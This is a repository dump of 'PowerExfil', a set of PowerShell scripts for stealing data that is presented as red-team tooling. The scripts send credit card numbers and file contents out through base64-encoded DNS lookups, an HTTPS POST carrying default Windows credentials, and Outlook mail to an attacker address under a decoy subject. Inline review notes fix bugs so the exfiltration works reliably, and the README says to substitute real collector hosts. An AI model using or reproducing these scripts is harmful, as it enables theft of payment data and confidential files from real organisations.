├── ExfilCards.ps1 ├── ExfilDataStreamDNS.ps1 ├── ExfilEmail.ps1 ├── ExfilHTTPS.ps1 └── README.md /ExfilCards.ps1: -------------------------------------------------------------------------------- 1 | # ExfilCards.ps1 by @xer0dayz - https://xerosecurity.com 2 | # 3 | # This script will exfil credit card numbers via base64 encoded strings to a custom DNS server. 4 | # 5 | 6 | $lines = Get-Content .\exfil.txt 7 | foreach ($line in $lines.Split('\r\n')){ 8 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($line) 9 | $EncodedText =[Convert]::ToBase64String($Bytes) 10 | nslookup "$EncodedText.yourburphost.burpcollaborator.net" 11 | } -------------------------------------------------------------------------------- /ExfilDataStreamDNS.ps1: -------------------------------------------------------------------------------- 1 | # ExfilDataStreamDNS.ps1 by @xer0dayz - https://xerosecurity.com 2 | # 3 | # This script will exfil the entire contents of a file via base64 encoded strings to a custom DNS server. 
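#
# Place the data to exfil in .\exfil.csv - the file's contents are sent, one
# line at a time. (The old comment said to put a *filename* in exfil.csv; the
# script reads the file's contents, not a path.)
# Update $dnsserver var with DNS server to use
#
# Per line: UTF-16LE -> base64 -> 'start' marker, labels of at most $buff
# characters, 'end' marker. Review notes:
#   - '=' padding is mapped to '00' as before (padding is recoverable from
#     the decoded length mod 4). '+' and '/' are additionally mapped to '-'
#     and '_' because they are not valid in a DNS name and the local resolver
#     refuses such queries before they leave the host. Reverse both mappings
#     before base64-decoding.
#   - The loop now stops at the encoded length; the original '-le' issued an
#     extra query with an empty label whenever the length was an exact
#     multiple of $buff.
#   - After the '=' -> '00' mapping a label can be $buff + 2 characters long,
#     so $buff must stay <= 61 to respect the 63-character label limit.
#   - Redirections: '2>$null' must sit on the nslookup itself; placed after
#     '| out-null' it silenced Out-Null, not nslookup.
#

$lines = Get-Content .\exfil.csv
$dnsserver = "yourhost.burpcollaborator.net"
$buff = 60   # encoded characters per DNS label (<= 61, see above)

foreach ($line in $lines) {
    echo "Line: $line"
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($line)
    $EncodedText = [Convert]::ToBase64String($Bytes)
    echo "EncodedText: $EncodedText"
    $EncodedTextLength = $EncodedText.Length
    echo "EncodedTextLength: $EncodedTextLength"

    echo "Start ==============================================="
    nslookup "start.$dnsserver" 2>$null | Out-Null

    for ($i = 0; $i -lt $EncodedTextLength; $i += $buff) {
        $take = [Math]::Min($buff, $EncodedTextLength - $i)
        $EncodedTextStream = $EncodedText.Substring($i, $take)
        # hostname-safe label: '=' -> '00' (existing convention), '+' -> '-', '/' -> '_'
        $EncodedTextStream = $EncodedTextStream.Replace('=', '00').Replace('+', '-').Replace('/', '_')
        echo "Full DNS: $EncodedTextStream.$dnsserver"
        nslookup "$EncodedTextStream.$dnsserver" 2>$null | Out-Null
    }

    echo "End ==============================================="
    nslookup "end.$dnsserver" 2>$null | Out-Null
}
--------------------------------------------------------------------------------

/ExfilEmail.ps1:
--------------------------------------------------------------------------------
# ExfilEmail.ps1 by @xer0dayz - https://xerosecurity.com
#
# This script will exfil the entire contents of a file or given command via base64 encoded strings using email to a custom email address.
#
# Review notes:
#   - Get-Content without -Raw returns one string per line; handing that
#     array to GetBytes() makes PowerShell join the elements with $OFS (a
#     space), so every line break was lost. -Raw sends the file as-is. For the
#     command variant pipe through Out-String for the same reason.
#   - Sending through the Outlook COM object is loud on the host: the message
#     goes out from the user's own mailbox (and lands in Sent Items), and
#     Outlook's object-model guard may show a confirmation prompt. That is
#     inherent to the technique; know it before relying on it.
#

$Outlook = New-Object -ComObject Outlook.Application
$Mail = $Outlook.CreateItem(0)   # 0 = olMailItem
$Mail.To = "ATTACKER_EMAIL@mailinator.com"
$Mail.Subject = "Nothing to see here... "
#$content = Invoke-Command {Get-Process} | Out-String
$content = Get-Content exfil.txt -Raw

#Base64 Encoder
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($content)
$EncodedText = [Convert]::ToBase64String($Bytes)
#$EncodedText

$Mail.Body = $EncodedText
#attachments
$file = "C:\Temp\exfil.txt"
#$Mail.Attachments.Add($file);
#send message
$Mail.Send()
#quit and cleanup
#$Outlook.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null
--------------------------------------------------------------------------------

/ExfilHTTPS.ps1:
--------------------------------------------------------------------------------
# ExfilHTTPS.ps1 by @xer0dayz - https://xerosecurity.com
#
# This script will exfil the entire contents of a file via base64 encoded strings via HTTPS POST request to custom web server.
#
# Review notes:
#   - The original computed $EncodedText but posted the raw $content, and
#     labelled it "multipart/form-data" although the body carried no
#     multipart boundary. The base64 text is now what gets posted, as
#     text/plain, which matches the header comment and the README.
#   - Get-Content -Raw keeps line breaks; without it the line array is joined
#     with spaces when converted to bytes.
#   - -UseDefaultCredentials answers an NTLM/Negotiate challenge from the
#     receiving server with the current user's Windows credentials. Keep it
#     only if that is intended; it is not needed to reach a plain HTTPS
#     collector, and -ProxyUseDefaultCredentials is the option for an
#     authenticating proxy.
#

# Windows PowerShell 5.1 may otherwise offer only TLS 1.0 and fail the handshake;
# this adds TLS 1.2 without removing anything already enabled.
[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12

$content = Get-Content exfil.txt -Raw
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($content)
$EncodedText = [Convert]::ToBase64String($Bytes)
$uri = "https://yourhost.burpcollaborator.net"
Invoke-RestMethod -Uri $uri -Body $EncodedText -UseDefaultCredentials -Method Post -ContentType "text/plain"
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# PowerExfil
## A collection of custom data exfiltration scripts for Red Team assessments.
* ExfilCards.ps1 - This script will exfil credit card numbers via base64 encoded strings to a custom DNS server.
* ExfilDataStreamDNS.ps1 - This script will exfil the entire contents of a file via base64 encoded strings to a custom DNS server.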
* ExfilEmail.ps1 - This script will exfil the entire contents of a file or given command via base64 encoded strings using email to a custom email address.
* ExfilHTTPS.ps1 - This script will exfil the entire contents of a file via base64 encoded strings via an HTTPS POST request to a custom web server.

Before use, replace the placeholder `burpcollaborator.net` hostnames, the `ATTACKER_EMAIL@mailinator.com` address and the input file names (`exfil.txt` / `exfil.csv`) in each script with your own values.

### NOTE: These scripts are provided "as is" for educational purposes only.
--------------------------------------------------------------------------------